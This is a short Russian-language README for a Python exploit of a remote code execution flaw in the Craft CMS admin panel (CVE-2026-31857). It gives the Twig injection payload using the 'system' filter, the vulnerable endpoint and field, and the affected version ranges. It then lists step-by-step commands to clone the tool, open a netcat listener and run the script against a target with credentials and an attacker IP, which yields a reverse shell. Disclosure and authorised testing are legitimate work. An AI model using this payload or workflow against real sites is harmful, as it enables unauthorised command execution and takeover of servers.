
Craft CMS RCE через реляционные условия в панели управления
Эксплойт на Python для уязвимости RCE в панели администратора Craft CMS, срабатывающий через эндпоинт admin/actions/element-indexes/count-elements.
Инъекция проходит через поле elementIds условия RelatedToConditionRule, которое интерпретируется как Twig на стороне сервера и эксплуатируется через системный фильтр для выполнения произвольной команды ({{[['<cmd>']|filter('system')]}}).
Уязвимость раскрыта NeoSprings
Уязвимые версии :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3Ссылки :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
Этот инструмент предоставляется исключительно в образовательных целях и для авторизованных испытаний (CTF, контрактное тестирование на проникновение или локальное тестирование). Использование его против любой системы без явного разрешения является незаконным.